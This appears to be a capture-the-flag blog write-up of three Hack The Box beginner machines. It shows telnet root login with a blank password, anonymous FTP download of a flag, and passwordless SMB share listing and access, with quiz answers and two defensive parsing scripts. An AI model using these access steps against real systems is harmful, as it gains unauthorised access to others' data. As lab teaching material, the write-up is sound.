
Starting Point Tier 0 HTB

Meow Machine (Telnet)

Theory

What does the acronym VM stand for?

 Virtual Machine 

What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.

Terminal

What service do we use to form our VPN connection into HTB labs?

openvpn

What is the abbreviated name for a ‘tunnel interface’ in the output of your VPN boot-up sequence output?

tun

What tool do we use to test our connection to the target with an ICMP echo request?

ping

What is the name of the most common tool for finding open ports on a target?

nmap

What service do we identify on port 23/tcp during our scans?

telnet

What username is able to log into the target over telnet with a blank password?

root

Practical

Now we try to connect to Telnet on port 23 with the following commands:

$ telnet 10.129.53.52
Trying 10.129.53.52...
Connected to 10.129.53.52.
Escape character is '^]'.
root
....
  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: root
....
root@Meow:~#
root@Meow:~# ls 
flag.txt  snap
root@Meow:~# cat flag.txt
j89************o

Fawn Machine (FTP)

FTP Services

In this case we answer the questions about this service:

What does the 3-letter acronym FTP stand for?

File Transfer Protocol

This website can help you with some information.

Which port does the FTP service listen on usually?

Port 21 

What acronym is used for the secure version of FTP?

SFTP (Secure File Transfer Protocol)

From your scans, what version is FTP running on the target?

nc -vn 10.129.157.27  21
....
vsFTPd 3.0.3

  1. From your scans, what OS type is running on the target?
  2. What is the username that is used over FTP when you want to log in without having an account?
  3. What is the response code we get for the FTP message ‘Login successful’?

$ ftp 10.129.157.27
Connected to 10.129.157.27.
220 (vsFTPd 3.0.3)
Name (10.129.157.27:lazy29t): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

So the answers are:

  1. UNIX
  2. anonymous
  3. 230

There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files?

ftp> ls
229 Entering Extended Passive Mode (|||26254|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> cat flag.txt

What is the command used to download the file we found on the FTP server?

ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||64477|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |***********************************|    32      183.82 KiB/s    00:00 ETA
226 Transfer complete.
get

Submit the flag

~/Desktop/HTB/StartPoint$ ls
flag.txt
~/Desktop/HTB/StartPoint$ cat flag.txt
4g5**************e
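
The reply codes seen in the Fawn session above (220, 331, 230, 229, 150, 226) can be checked mechanically from a defender's side. The following is an added example, not part of the original post: it parses an FTP control-channel transcript and reports the banner, whether an anonymous login was accepted, and the passive data ports. The `USER`/`PASS`/`EPSV`/`LIST` client lines are a constructed wire-level view of what the `ftp` client sends, and the function names are hypothetical.

```python
import re

# Constructed wire-level view of the session above: server replies are from the
# page; the USER/PASS/EPSV/LIST client lines are what an ftp client sends.
SESSION = """\
220 (vsFTPd 3.0.3)
USER anonymous
331 Please specify the password.
PASS
230 Login successful.
EPSV
229 Entering Extended Passive Mode (|||26254|)
LIST
150 Here comes the directory listing.
226 Directory send OK.
"""

REPLY = re.compile(r"^(\d{3})([ -])(.*)$")        # "230 text" or "230-text" (multi-line)
EPSV_PORT = re.compile(r"\(\|\|\|(\d{1,5})\|\)")  # RFC 2428 reply: (|||port|)
ANON_USERS = {"anonymous", "ftp"}                 # conventional anonymous account names

def parse_reply(line):
    """Return (code, is_final, text) for a server reply, None for a client line."""
    m = REPLY.match(line)
    return (int(m.group(1)), m.group(2) == " ", m.group(3)) if m else None

def audit_session(transcript):
    """Summarise banner, anonymous-login acceptance and negotiated data ports."""
    report = {"banner": None, "anonymous_login": False, "data_ports": []}
    user = None
    for line in transcript.splitlines():
        reply = parse_reply(line)
        if reply is None:                         # client command: remember USER
            verb, _, arg = line.partition(" ")
            if verb.upper() == "USER":
                user = arg.strip().lower()
            continue
        code, is_final, text = reply
        if not is_final:                          # continuation of a multi-line reply
            continue
        if code == 220 and report["banner"] is None:
            report["banner"] = text               # version disclosed before login
        elif code == 230 and user in ANON_USERS:  # login accepted for anonymous
            report["anonymous_login"] = True
        elif code == 229:                         # server opened a passive data port
            m = EPSV_PORT.search(text)
            if m:
                report["data_ports"].append(int(m.group(1)))
    return report
```

Calling `audit_session(SESSION)` on the sample reports the vsFTPd banner, an accepted anonymous login and data port 26254.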

Dancing Machine (SMB)

What does the 3-letter acronym SMB stand for?

Server Message Block

What port does SMB use to operate at?

445

What is the service name for port 445 that came up in our Nmap

$ nmap -p445 -sV -v --min-rate 5000 10.129.168.26 
....
PORT    STATE SERVICE       VERSION
445/tcp open  microsoft-ds?

How many shares are there on Dancing?

smbclient --no-pass -L 10.129.168.26

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
SMB1 disabled -- no workgroup available
  • The answer is: 4
smbclient //10.129.50.160/WorkShares
Enter WORKGROUP\lazy29t's password: 
smb: \> ls
  .                                   D        0  -
  ..                                  D        0  -
  Amy.J                               D        0  -
  James.P                             D        0  -
smb: \> cd James.P
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 01:38:03 2021
  ..                                  D        0  Thu Jun  3 01:38:03 2021
  flag.txt                            A       32  Mon Mar 29 02:26:57 2021

smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
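
For an administrator reviewing the same host, the share table printed by `smbclient --no-pass -L` above separates into the Windows default hidden shares and the one custom share that was readable without a password. The following is an added example, not part of the original post: it parses that table and returns the shares whose permissions need review. The sample text is copied from the listing above and the function names are hypothetical.

```python
import re

# Constructed sample: the share table from the `smbclient --no-pass -L` output above.
LISTING = """\
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk
SMB1 disabled -- no workgroup available
"""

# A data row is indented and its second column is a known share type; this skips
# the header, the dashed rule and status lines. Share names containing spaces
# are not handled by this simple pattern.
ROW = re.compile(r"^\s+(\S+)\s+(Disk|IPC|Printer)\b\s*(.*)$")

def parse_shares(listing):
    """Return one dict per share row: name, type, comment and hidden flag."""
    shares = []
    for line in listing.splitlines():
        m = ROW.match(line)
        if m:
            name, kind, comment = m.groups()
            shares.append({
                "name": name,
                "type": kind,
                "comment": comment.strip(),
                # A trailing $ marks a hidden share; ADMIN$, C$ and IPC$ are
                # the Windows defaults seen in the listing.
                "hidden": name.endswith("$"),
            })
    return shares

def shares_to_review(shares):
    """Non-hidden disk shares enumerated without a password: check their ACLs."""
    return [s["name"] for s in shares if s["type"] == "Disk" and not s["hidden"]]
```

On the sample, `parse_shares` returns the four shares counted in the answer above and `shares_to_review` returns only `WorkShares`.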

This post is licensed under CC BY 4.0 by the author.